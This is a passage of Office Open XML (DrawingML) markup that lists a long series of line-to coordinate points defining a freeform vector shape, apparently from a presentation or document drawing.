                  <a:pt x="6208" y="12462"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6198" y="12504"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6229" y="12616"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6281" y="12699"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6396" y="12844"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6519" y="12988"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6530" y="13040"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6592" y="13120"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6613" y="13306"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6634" y="13530"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6629" y="13839"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6629" y="14118"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6639" y="14384"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6618" y="14548"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6643" y="14711"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6639" y="14824"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6669" y="15029"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6669" y="15234"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6660" y="15452"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6648" y="15677"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6629" y="15677"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6655" y="15831"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6690" y="15966"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6674" y="16056"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6695" y="16303"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6711" y="16498"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6752" y="16518"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6742" y="16344"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6784" y="16386"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6804" y="16662"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6732" y="16611"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6758" y="16839"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6726" y="16960"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6815" y="16993"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6778" y="17095"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6778" y="17227"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6836" y="17455"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6877" y="17535"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6881" y="17618"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6919" y="17698"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6996" y="17772"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7079" y="17865"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7147" y="17904"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7167" y="17904"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7147" y="17782"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7183" y="17730"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7204" y="17698"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7251" y="17698"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7270" y="17711"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7218" y="17628"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7178" y="17493"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7188" y="17432"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7225" y="17381"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7230" y="17227"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7282" y="17156"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7277" y="17031"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7225" y="17012"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7152" y="16909"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7152" y="16806"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7183" y="16745"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7235" y="16745"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7235" y="16672"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7225" y="16530"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7256" y="16447"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7296" y="16405"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7270" y="16335"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7244" y="16386"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7204" y="16344"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7178" y="16210"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7192" y="16171"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7256" y="16222"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7307" y="16200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7333" y="16149"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7317" y="16088"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7312" y="15985"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7291" y="15902"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7354" y="15914"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7468" y="15892"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7541" y="15821"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7576" y="15645"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7571" y="15574"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7529" y="15513"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7529" y="15420"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7447" y="15308"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7442" y="15234"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7484" y="15308"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7524" y="15308"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7581" y="15369"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7614" y="15350"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7654" y="15379"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7711" y="15298"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7732" y="15215"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7763" y="15144"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7779" y="15010"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7809" y="14949"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7856" y="14836"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7903" y="14599"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7939" y="14528"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7950" y="14455"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7950" y="14323"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7939" y="14240"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7939" y="14147"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7986" y="14002"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8048" y="13899"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8116" y="13861"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8151" y="13797"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8245" y="13745"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8313" y="13745"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8323" y="13665"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8370" y="13604"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8375" y="13470"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8427" y="13283"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8431" y="13110"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8452" y="13049"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8452" y="12966"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8469" y="12751"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8457" y="12494"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8469" y="12401"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8483" y="12391"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8530" y="12279"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8561" y="12125"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8644" y="11929"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8676" y="11846"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8695" y="11621"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8686" y="11538"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8665" y="11365"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8644" y="11323"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8592" y="11313"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8546" y="11272"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8462" y="11118"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8375" y="11005"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8281" y="11015"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8167" y="10944"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8095" y="10986"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8106" y="10912"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8073" y="10832"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7976" y="10749"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7899" y="10697"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7852" y="10790"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7852" y="10656"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7743" y="10627"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7722" y="10585"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7769" y="10482"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7769" y="10380"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7737" y="10357"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7701" y="10123"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7691" y="10049"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7670" y="10049"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7659" y="9998"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7597" y="9886"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7550" y="9857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7529" y="9834"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7468" y="9793"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7416" y="9805"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7411" y="9834"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7338" y="9805"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7312" y="9764"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7282" y="9690"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7260" y="9690"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7260" y="9619"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7225" y="9526"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7183" y="9475"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7162" y="9446"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7131" y="9456"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7121" y="9343"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7079" y="9270"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7032" y="9260"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7011" y="9199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7063" y="9157"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6992" y="9157"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6919" y="9167"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6914" y="9209"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6877" y="9250"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6836" y="9228"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6799" y="9167"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6737" y="9189"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6681" y="9176"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6681" y="9138"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6643" y="9064"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6603" y="9055"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6582" y="8961"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6561" y="9003"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6566" y="9074"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6488" y="9125"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6488" y="9228"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6509" y="9279"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6493" y="9372"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6462" y="9382"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6447" y="9279"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6473" y="9199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6478" y="9125"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6457" y="9064"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6493" y="9045"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6499" y="9013"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6509" y="8971"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6493" y="8933"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6473" y="8920"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6441" y="8994"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6422" y="9022"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6370" y="9096"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6323" y="9074"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6318" y="9106"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6281" y="9106"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6240" y="9176"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6229" y="9292"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6224" y="9330"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6198" y="9353"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6151" y="9446"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6120" y="9433"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6099" y="9404"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6078" y="9363"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6052" y="9330"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6022" y="9330"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6022" y="9321"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5991" y="9311"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5970" y="9353"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5934" y="9382"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5903" y="9414"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5877" y="9424"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5861" y="9395"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5851" y="9404"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5830" y="9395"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5830" y="9363"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5809" y="9321"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5783" y="9260"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5762" y="9209"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5748" y="9125"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5741" y="9106"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5741" y="9074"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5753" y="9035"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5753" y="9003"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5758" y="8942"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5767" y="8933"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5767" y="8868"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5767" y="8830"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5774" y="8766"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5779" y="8714"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5800" y="8676"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5793" y="8625"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5800" y="8593"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5804" y="8583"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5788" y="8541"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5767" y="8522"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5753" y="8490"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5736" y="8458"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5727" y="8458"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5701" y="8439"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5685" y="8448"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5670" y="8458"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5659" y="8448"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5638" y="8439"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5633" y="8458"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5612" y="8471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5581" y="8471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5555" y="8458"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5545" y="8471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5540" y="8458"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5524" y="8458"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5508" y="8480"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5503" y="8480"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5489" y="8458"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5482" y="8480"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5463" y="8458"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5477" y="8406"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5489" y="8406"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5503" y="8368"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5515" y="8294"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5508" y="8284"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5519" y="8233"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5515" y="8214"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5529" y="8163"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5529" y="8121"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5519" y="8121"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5519" y="8098"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5534" y="8098"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5545" y="8130"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5571" y="8028"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5581" y="7967"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5571" y="7944"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5592" y="7864"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5628" y="7781"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5638" y="7720"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5623" y="7688"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5586" y="7701"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5534" y="7688"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5468" y="7720"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5426" y="7761"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5416" y="7803"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5400" y="7916"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5379" y="7996"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5338" y="8047"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5301" y="8070"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5255" y="8098"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5208" y="8111"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5152" y="8150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5131" y="8089"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5068" y="8060"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5053" y="7986"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5042" y="7916"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5011" y="7813"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5006" y="7701"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4996" y="7636"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4990" y="7566"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5001" y="7495"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5022" y="7319"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5037" y="7216"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5074" y="7094"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5068" y="7052"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5074" y="6982"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5084" y="6889"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5105" y="6828"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5140" y="6764"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5208" y="6703"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5275" y="6600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5327" y="6571"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5364" y="6558"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5400" y="6600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5456" y="6581"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5489" y="6651"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5534" y="6651"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5555" y="6632"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5576" y="6651"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5592" y="6632"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5581" y="6600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5586" y="6549"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5581" y="6507"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5607" y="6488"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5654" y="6478"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5706" y="6497"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5774" y="6478"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5804" y="6520"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5826" y="6581"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5835" y="6581"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5903" y="6520"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5923" y="6539"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5955" y="6661"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5965" y="6735"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5944" y="6828"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5944" y="6879"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5965" y="6982"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5986" y="7094"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6000" y="7123"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6007" y="7187"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6038" y="7206"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6052" y="7187"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6073" y="7104"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6085" y="7052"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6094" y="6959"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6078" y="6805"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6085" y="6744"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6068" y="6642"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6064" y="6529"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6064" y="6436"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6085" y="6334"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6120" y="6263"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6162" y="6189"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6234" y="6109"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6250" y="6058"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6285" y="6006"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6311" y="6006"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6363" y="5923"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6426" y="5881"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6478" y="5779"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6488" y="5647"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6488" y="5596"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6473" y="5583"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6488" y="5461"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6457" y="5419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6488" y="5429"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6493" y="5349"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6509" y="5288"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6499" y="5400"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6519" y="5451"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6493" y="5544"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6493" y="5554"/>
                </a:lnTo>
                <a:lnTo>
